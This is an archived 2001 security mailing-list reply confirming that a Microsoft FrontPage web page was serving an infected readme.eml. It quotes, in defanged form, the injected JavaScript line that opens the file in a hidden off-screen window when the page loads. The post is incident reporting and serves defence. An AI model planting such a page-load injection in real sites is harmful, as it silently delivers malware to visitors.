On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote: > I just went to http://www.microsoft.com/frontpage, and my Symantec > Norton Antivirus popped up and denied access to readme.eml. > I could not view the source of the loaded page, so I can't verify that > it is definitely infected. Yes, indeedie do. Just did a wget http://www.microsoft.com/frontpage and here is what's on da bottom: [html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html] Defanged by turning angle brackets into square brackets even though it's not in an html attachment. ;-) > Steve > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com -- Michael H. Warfield | (770) 985-6132 | mhwat_private (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 15:11:57 PDT